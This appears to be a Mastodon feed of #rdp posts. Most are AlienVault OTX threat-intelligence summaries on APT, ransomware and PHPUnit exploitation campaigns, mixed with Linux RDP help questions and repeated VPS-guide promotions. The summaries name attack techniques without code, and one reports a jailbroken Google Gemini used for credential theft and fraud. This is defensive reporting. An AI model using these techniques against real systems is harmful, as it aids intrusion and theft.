Cloud Atlas activity in the second half of 2025 and early 2026: new tools and a new payload

Cloud Atlas APT group targeted government organizations and commercial companies in Russia and Belarus during late 2025 and early 2026, employing phishing campaigns with malicious ZIP archives containing LNK shortcuts. The attackers deployed multiple backdoors including VBCloud for file theft and PowerShower for network reconnaissance. New tools identified include PowerCloud, which exfiltrates data to Google Sheets, and browser checker utilities. The group established persistence through reverse SSH tunnels, patched OpenSSH binaries, ReverseSocks, and Tor networking. Initial infection vectors included malicious shortcuts executing PowerShell scripts and exploiting CVE-2018-0802 in Microsoft Office. The attackers performed credential theft, RDP manipulation via termsrv.dll patching, and lateral movement across networks while maintaining multiple backup control channels.

Pulse ID: 6a105530af26afbd3752ab81
Pulse Link: https://otx.alienvault.com/pulse/6a105530af26afbd3752ab81
Pulse Author: AlienVault
Created: 2026-05-22 13:08:00

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #Belarus #Browser #Cloud #CloudAtlas #CyberSecurity #Google #Government #InfoSec #LNK #Microsoft #MicrosoftOffice #OTX #Office #OpenThreatExchange #Phishing #PowerShell #RAT #RDP #Russia #SSH #ZIP #bot #AlienVault

In the spirit of trying new things, I'm running Fedora 44 Workstation (i.e. Gnome50) on my laptop... whilst I run the KDE spin on my desktop.

I've noticed that setting up remote login on both is really easy... and using the default RDP viewer in KDE I can simply connect to my laptop... great.

However, trying to connect from my laptop to my desktop isn't working. (Firewalls have been configured, thanks).

Using the "Connections" app just fails to connect but never stops trying. I downloaded RustConn and that gives me an error telling me that it's spawned an external viewer (it hasn't) as the RDP server isn't compatible.

I can, however, connect to my desktop just fine from a Windows VM with the "Windows App" 🤢

Anyone have helpful suggestions?

#rdp #kde #gnome #fedora #linux

4 Steps to Easily Access #RDP Remote Desktop with #Windows #VPS

Read this guide, "4 Steps to Easily Access RDP Remote Desktop with Windows VPS" to connect your Windows VPS to RDP (remote desktop protocol). RDP technology also fulfills other IT needs. For example, some computers, such as rack-mounted servers in data centers, don't have input ...
Continued 👉 https://blog.radwebhosting.com/access-rdp-remote-desktop-with-windows-vps/?utm_source=mastodon&utm_medium=social&utm_campaign=mastodon.social #vpsguide #windowsserver #rdpserver #remotedesktopprotocol #microsoftremotedesktop #vpsservers #vpsplatform

The Gentleman Ransomware | Defense Evasion TTPs Uncovered

In April and May 2026, investigations revealed two incidents involving The Gentlemen ransomware-as-a-service operation, which has claimed over 400 victims across 70 countries since mid-2025. Both incidents demonstrated common tactics including Scheduled Tasks, PowerShell commands, and defense evasion techniques such as clearing Security, System, and Application Event Logs, disabling Microsoft Defender, and adding antivirus exclusions. A leaked internal database in early May exposed the operation's infrastructure, affiliate structure, and targeting of vulnerabilities like CVE-2024-55591. The attacks showed threat actors using RDP connections, disguised executables, SOCKS proxy connections for persistence, and domain-wide deployment via NETLOGON shares. Despite attempts to evade detection, sufficient forensic telemetry remained for analysis, revealing workstation names previously associated with Qilin ransomware and Lazarus infrastructure.

Pulse ID: 6a0f8f34dd916c38a643df30
Pulse Link: https://otx.alienvault.com/pulse/6a0f8f34dd916c38a643df30
Pulse Author: AlienVault
Created: 2026-05-21 23:03:16

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #ICS #InfoSec #Lazarus #Microsoft #MicrosoftDefender #OTX #OpenThreatExchange #PowerShell #Proxy #RAT #RDP #RansomWare #RansomwareAsAService #bot #AlienVault

One Man, One AI, One Fake Persona: Inside the 5-Year Influence and Fraud 'Patriot Bait' Campaign

A solo Russian-speaking threat actor tracked as 'bandcampro' operated a five-year MAGA-themed Telegram channel with approximately 17,000 subscribers, initially forwarding cryptocurrency scam content before pivoting to AI-automated operations in September 2025. The actor utilized jailbroken Google Gemini to generate QAnon-styled posts, deploy infrastructure, manage stolen API keys, and run credential theft operations targeting politically engaged American audiences. The campaign weaponized cultural alignment with QAnon and MAGA communities to facilitate cryptocurrency fraud rather than political influence. Through AI assistance, the actor cracked 29 WordPress admin credentials, infiltrated at least one company, deployed remote access trojans disguised as cryptocurrency wallets, and operated a gamified chatbot called 'QFS 2.0 Terminal'. The operation demonstrates how frontier AI systems enable scalable, low-cost cybercriminal activities by allowing a single actor to perform tasks traditionally requiring enti...

Pulse ID: 6a0f8f3596d6a5268e168a10
Pulse Link: https://otx.alienvault.com/pulse/6a0f8f3596d6a5268e168a10
Pulse Author: AlienVault
Created: 2026-05-21 23:03:17

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #Google #InfoSec #IoT #OTX #OpenThreatExchange #RAT #RDP #RemoteAccessTrojan #Russia #Telegram #Trojan #Word #Wordpress #bot #cryptocurrency #AlienVault

Gnome Remote Desktop with Ubuntu 26.04 and MacOSX Tahoe 26.5 and Windows App 11.35 (2947) #rdp

https://askubuntu.com/q/1567029/612

9 Year-Old PHP Vulnerability Keeps Swinging As One of the Most Targeted Vulnerabilities

CVE-2017-9841, a remote code execution vulnerability in PHPUnit's eval-stdin.php file, remains highly exploited nearly a decade after disclosure. Analysis reveals over 80,000 exploitation attempts detected in 30 days, with 36,500 hits in the last 10 days alone. The vulnerability affects PHPUnit versions prior to 4.8.28 and 5.x before 5.6.3, allowing attackers to execute arbitrary PHP code via POST requests without authentication. Mass-scanning infrastructure targets dozens of framework-specific paths across Laravel, Drupal, Yii, and WordPress installations. Primary attack sources include compromised infrastructure in the UK and US, delivering webshells and botnet payloads. Multiple botnets including RondoDox, Kinsing, KashmirBlack, Sysrv, and Androxgh0st actively exploit this vulnerability. The persistent exploitation stems from developers failing to exclude development dependencies in production environments and exposing vendor directories to web servers.

Pulse ID: 6a0ca36a3571d3fbd4cd92bc
Pulse Link: https://otx.alienvault.com/pulse/6a0ca36a3571d3fbd4cd92bc
Pulse Author: AlienVault
Created: 2026-05-19 17:52:42

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#AndroxGh0st #CyberSecurity #InfoSec #Kinsing #OTX #OpenThreatExchange #PHP #RCE #RDP #RemoteCodeExecution #UK #Vulnerability #Word #Wordpress #bot #botnet #developers #AlienVault

4 Steps to Easily Access #RDP Remote Desktop with #Windows #VPS

Read this guide, "4 Steps to Easily Access RDP Remote Desktop with Windows VPS" to connect your Windows VPS to RDP (remote desktop protocol). RDP technology also fulfills other IT needs. For example, some computers, such as rack-mounted servers in data centers, don't have input ...
Continued 👉 https://blog.radwebhosting.com/access-rdp-remote-desktop-with-windows-vps/?utm_source=mastodon&utm_medium=social&utm_campaign=mastodon.social #vpsguide #rdpserver #remotedesktopprotocol #microsoftremotedesktop #vpsplatform #windowsserver #vpsservers

4 Steps to Easily Access #RDP Remote Desktop with #Windows #VPS

Read this guide, "4 Steps to Easily Access RDP Remote Desktop with Windows VPS" to connect your Windows VPS to RDP (remote desktop protocol). RDP technology also fulfills other IT needs. For example, some computers, such as rack-mounted servers in data centers, don't have input ...
Continued 👉 https://blog.radwebhosting.com/access-rdp-remote-desktop-with-windows-vps/?utm_source=mastodon&utm_medium=social&utm_campaign=mastodon.raddemo.host #vpsguide #microsoftremotedesktop #vpsservers #vpsplatform #remotedesktopprotocol #windowsserver #rdpserver